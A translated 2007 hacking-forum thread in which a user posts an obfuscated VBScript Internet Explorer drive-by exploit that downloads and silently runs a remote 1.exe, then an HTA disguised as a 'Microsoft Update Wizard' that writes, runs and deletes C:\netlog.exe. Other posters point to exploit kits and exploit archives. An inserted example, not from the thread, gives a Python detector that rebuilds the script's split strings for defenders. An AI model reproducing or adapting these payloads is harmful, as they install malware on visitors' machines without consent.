Question about an exploit for IE


4uTeP
24.09.2007, 18:05
I have an exploit:
<html>
<body>
<script language="VBScript">
on error resume next
xurl_0="http://САЙТ точка рУ /1.exe"
wbb61f=""
ibb72o="A"
fbb83u="dodb.Stream"
ess01a="Microsoft.XMLH"
uss12h="T"
vss83s="TP"
mcc11h="clsid:BD96C556-65A3-11D0-983A-00C04FC29"
xcc22r="E"
xcc33n="36"
boo71b="Scrip"
doo52e="t"
koo23v="ing.FileSystemObject"
djj61a="obj"
ajj82p="e"
hjj03t="ct"
kcl11r="cla"
mcl42e="s"
lcl63c="sid"
tse41c="Shell.Appli"
bse72h="c"
yse43t="ation"
l5sus0=ess01a&uss12h&vss83s
h3b2bp=wbb61f&ibb72o&fbb83u
c2cac2=mcc11h&xcc22r&xcc33n
j0o2ok=boo71b&doo52e&koo23v
h7jdj8=djj61a&ajj82p&hjj03t
o5l8lo=kcl11r&mcl42e&lcl63c
t0eke8=tse41c&bse72h&yse43t
Set j5d5fa = document.createElement(h7jdj8)
j5d5fa.setAttribute o5l8lo, c2cac2
set x0f5b = j5d5fa.createobject(j0o2ok,"")
set e1x3j = j5d5fa.CreateObject(l5sus0,"")
set h4sm7 = j5d5fa.CreateObject(h3b2bp,"")
set d8qr6 = j5d5fa.CreateObject(t0eke8,"")
set cte2mp = x0f5b.GetSpecialFolder(2)
h4sm7.type = 1
q1get="GET"
e1x3j.Open q1get, xurl_0, False
e1x3j.Send
a5L_xy30= "1.exe"
a5L_xy30= x0f5b.BuildPath(cte2mp,a5L_xy30)
h4sm7.open
h4sm7.write e1x3j.responseBody
h4sm7.savetofile a5L_xy30,2
h4sm7.close
d8qr6.ShellExecute a5L_xy30,"","","open",0
</script>
</body>
</html>


But it doesn't work for everyone (under Windows). Does anyone have another script?
If so, leave it in the thread. Thanks.
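
Added example, not part of any post in this thread: a static resolver a defender can run over a page like the one above to fold its split string assignments back together and flag the object names they spell out. The watchlist, its descriptions and the function names are assumptions made for this example; the sample lines are copied from the posted script.

```python
import re

# Assignment lines copied from the VBScript posted above; everything else is added here.
SAMPLE = '''
ess01a="Microsoft.XMLH"
uss12h="T"
vss83s="TP"
wbb61f=""
ibb72o="A"
fbb83u="dodb.Stream"
mcc11h="clsid:BD96C556-65A3-11D0-983A-00C04FC29"
xcc22r="E"
xcc33n="36"
l5sus0=ess01a&uss12h&vss83s
h3b2bp=wbb61f&ibb72o&fbb83u
c2cac2=mcc11h&xcc22r&xcc33n
'''

# Assumed watchlist: the object names the posted script assembles at run time.
WATCHLIST = {
    "microsoft.xmlhttp": "HTTP download object",
    "adodb.stream": "binary stream saved to disk",
    "scripting.filesystemobject": "file system access",
    "shell.application": "process launch",
    "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36": "ActiveX class used to create the other objects",
}

# An operand is a VBScript string literal ("" escapes a quote) or a variable name.
OPERAND = r'(?:"(?:[^"]|"")*"|[A-Za-z_]\w*)'
ASSIGN = re.compile(rf'^\s*([A-Za-z_]\w*)\s*=\s*({OPERAND}(?:\s*[&+]\s*{OPERAND})*)\s*$')
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')

def resolve(source):
    """Fold `name = "lit" & other` assignments into complete strings, top to bottom."""
    env = {}
    for line in source.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue  # calls, object assignments and numbers are ignored
        parts = [env.get(ident.lower()) if ident else lit.replace('""', '"')
                 for lit, ident in TOKEN.findall(m.group(2))]
        if None not in parts:  # skip expressions that use an unresolved name
            env[m.group(1).lower()] = "".join(parts)  # VBScript names are case-insensitive
    return env

def flag(source):
    """Return {variable: (resolved value, reason)} for values on the watchlist."""
    return {name: (value, WATCHLIST[value.lower()])
            for name, value in resolve(source).items() if value.lower() in WATCHLIST}
```

Matching on the resolved values rather than on the raw text is what lets a content filter or proxy rule catch this page even though none of the object names appears in it as a whole string.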

Zitt
24.09.2007, 18:21
MPack.... look on hack portals...

Termin@L
24.09.2007, 18:36
As I understand it, it launches an exe.
xurl_0="http://САЙТ точка рУ /1.exe" - did you change it?

P.S. Is there even an IE for Unix????

gibson
24.09.2007, 18:58
There is a dedicated thread on exploits for IE, head over here:
http://forum.antichat.ru/thread24465-exploit.html
And otherwise, visit milw0rm more often.

mr.The
24.09.2007, 21:12
Author, this is the place for you:
http://milw0rm.com/

4uTeP
29.09.2007, 03:23
On milw0rm I either searched badly or didn't find what I need.
>gibson I didn't find anything good in that thread..
>Termin@L Yes, I changed it. I need it to work under SP2 too.
Here is another one, as an .HTA:



<HTML><HEAD><TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><SCRIPT language="VBScript">
self.MoveTo 6000,6000
z=""
a="4"+"D"+"5"+"A"
z=z+(h(a))
FileName="C:\netlog.exe"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
IESetup.Write(z)
IESetup.Close()
MSplay.Run (FileName),1,TRUE
MSmedia.DeleteFile(FileName)
self.Close
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
m=1
H2=H2&Chr("&h"&Mid(H1,H3,2))
m=0
Next
H=H2
End Function
</SCRIPT></BODY></HTML>

It creates netlog.exe in C:. The script is old but works, only I can't manage to decode the characters and change it to suit me.